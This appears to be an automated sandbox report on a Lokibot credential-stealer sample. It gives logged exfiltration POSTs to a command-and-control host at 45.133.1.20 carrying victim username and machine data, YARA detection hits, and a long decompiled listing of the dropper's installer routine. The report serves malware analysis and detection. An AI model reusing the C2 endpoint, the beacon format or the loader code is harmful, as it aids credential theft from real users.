May 5, 2022 08:47:56.175396919 CEST	9356	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:56.201181889 CEST	9356	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:56.259251118 CEST	9356	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:56 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49778	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:12.988894939 CEST	1159	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:13.016323090 CEST	1160	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:13.084786892 CEST	1160	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:13 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49779	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:14.046129942 CEST	1161	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:14.071837902 CEST	1161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:14.137701988 CEST	1161	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:14 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49780	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:15.184581995 CEST	1162	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:15.210380077 CEST	1162	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:15.265968084 CEST	1162	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:15 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49781	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:16.336569071 CEST	1163	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:16.362673044 CEST	1163	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:16.421443939 CEST	1164	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:16 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ypdTgfE0o8.exePID: 7152, Parent PID: 5452

General

Target ID:	0
Start time:	08:45:50
Start date:	05/05/2022
Path:	C:\Users\user\Desktop\ypdTgfE0o8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ypdTgfE0o8.exe"
Imagebase:	0x400000
File size:	126706 bytes
MD5 hash:	D2CE3B2A5F3EFB1FCEDE96304E57A531
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cbgsujmwws.exePID: 6240, Parent PID: 7152

General

Target ID:	1
Start time:	08:45:52
Start date:	05/05/2022
Path:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
Imagebase:	0x400000
File size:	5632 bytes
MD5 hash:	F9E42C92E371CEDC22C78E2900418651
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 7%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cbgsujmwws.exePID: 492, Parent PID: 6240

General

Target ID:	2
Start time:	08:45:52
Start date:	05/05/2022
Path:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
Imagebase:	0x400000
File size:	5632 bytes
MD5 hash:	F9E42C92E371CEDC22C78E2900418651
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ypdTgfE0o8.exePID: 7152, Parent PID: 5452COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.8%
Total number of Nodes:	1372
Total number of Limit Nodes:	20

Executed Functions

Function 004034F7 Relevance: 86.2, APIs: 34, Strings: 15, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a2d8 = _v324.dwBuildNumber;
				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a2de != 0x600) {
					_t179 = E004068D4(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E00406864(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E004068D4(0xb);
				 *0x42a224 = E004068D4(9);
				_t88 = E004068D4(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a2dc =  *0x42a2dc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a2e0 = _t88;
				SHGetFileInfoW(0x4216c8, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406507(0x429220, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" ";
				E00406507(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a220 = 0x400000;
				_t250 = L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405E03(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405E03(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406507(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E004034C6(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2b4 == _t188) {
														L77:
														_t119 =  *0x42a2cc;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E004068D4(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B67(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a23c == _t188) {
												L51:
												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
												_v24 = E00403BB6(_t264);
												goto L68;
											}
											_t218 = E00405E03(L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" ") {
													_t189 = E00405AD2(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405AB5();
														} else {
															E00405A38();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406507(L"C:\\Users\\engineer\\AppData\\Local\\Temp", 0x436800);
														}
														E00406507(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
															DeleteFileW(0x420ec8);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe", 0x420ec8, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E004062C7(_t201, 0x420ec8, 0);
																	E00406544(0, 0x420ec8, _t234, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
																	_t152 = E00405AEA(0x420ec8);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062C7(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00405EDE(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406507(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
												E00406507(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\engineer\\Desktop\\ypdTgfE0o8.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E004034C6(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E004034C6(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a2c0 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x00403505
0x00403506
0x0040350d
0x00403510
0x00403517
0x0040351a
0x0040352d
0x00403533
0x00403536
0x00403539
0x00403547
0x0040354f
0x0040355a
0x00403573
0x00403575
0x0040357d
0x0040357d
0x00403588
0x0040358a
0x0040358a
0x0040359f
0x004035c4
0x004035d2
0x004035d5
0x004035dc
0x004035e3
0x004035e3
0x004035dc
0x004035e5
0x004035ea
0x004035eb
0x004035f7
0x004035fb
0x00403602
0x00403610
0x00403615
0x0040361c
0x00403620
0x00403624
0x00403626
0x00403626
0x00403624
0x0040362d
0x00403634
0x0040363a
0x00403652
0x00403662
0x00403667
0x0040366d
0x00403674
0x0040367b
0x0040367d
0x0040367e
0x00403688
0x0040368f
0x00403691
0x00403693
0x00403693
0x004036a6
0x004036a8
0x004037a2
0x004037a2
0x004037a5
0x004037a8
0x00000000
0x00000000
0x004036b2
0x004036b3
0x004036b6
0x004036bf
0x004036bf
0x004036c2
0x004036c5
0x004036c8
0x004036cb
0x004036cb
0x004036cb
0x004036cc
0x004036d0
0x00403790
0x00403799
0x0040379b
0x0040379e
0x004037a1
0x004037a1
0x004037a1
0x00000000
0x004036d6
0x004036d7
0x004036d8
0x004036dc
0x004036f6
0x004036fd
0x00403710
0x00403711
0x00403726
0x0040372b
0x0040372d
0x0040372f
0x0040374b
0x00403752
0x00403765
0x00403766
0x0040377b
0x00403781
0x00403783
0x00403785
0x0040378d
0x0040378f
0x00000000
0x0040378f
0x00403789
0x0040378b
0x004037b0
0x004037b4
0x004037bd
0x004037c2
0x004037c8
0x004037d3
0x004037d5
0x004037da
0x004037dc
0x00403834
0x00403839
0x00403842
0x00403849
0x0040384c
0x00403a23
0x00403a23
0x00403a28
0x00403a31
0x00403a4e
0x00403ac6
0x00403ac6
0x00403ace
0x00403ad0
0x00403ad0
0x00403ad6
0x00403ad6
0x00403a65
0x00403a71
0x00403a82
0x00403a89
0x00403a90
0x00403a90
0x00403a98
0x00403aa4
0x00403ab2
0x00403abd
0x00000000
0x00000000
0x00000000
0x00403aa6
0x00403aa6
0x00403aa7
0x00403aa9
0x00403aaa
0x00403aab
0x00403ab0
0x00403abf
0x00403ac1
0x00000000
0x00403ac1
0x00000000
0x00403ab0
0x00403aa4
0x00403a3b
0x00403a42
0x00403a42
0x00403858
0x004038ff
0x004038ff
0x0040390b
0x00000000
0x0040390b
0x00403869
0x00403871
0x004038c3
0x004038c3
0x004038c9
0x004038d0
0x0040391e
0x00403920
0x00403925
0x00403927
0x0040392f
0x0040392f
0x0040393a
0x00403946
0x0040394c
0x0040394e
0x00403a21
0x00403a21
0x00403a21
0x00000000
0x00403954
0x00403954
0x00403956
0x00403957
0x00403960
0x00403959
0x00403959
0x00403959
0x00403966
0x0040396e
0x00403975
0x0040397d
0x0040397d
0x0040398a
0x00403996
0x004039a0
0x004039a0
0x004039a2
0x004039a9
0x004039b3
0x004039bf
0x004039c5
0x004039cb
0x004039ce
0x004039d8
0x004039de
0x004039e0
0x004039e4
0x004039f5
0x004039fb
0x00403a00
0x00403a02
0x00403a05
0x00403a0b
0x00403a0b
0x00403a02
0x004039e0
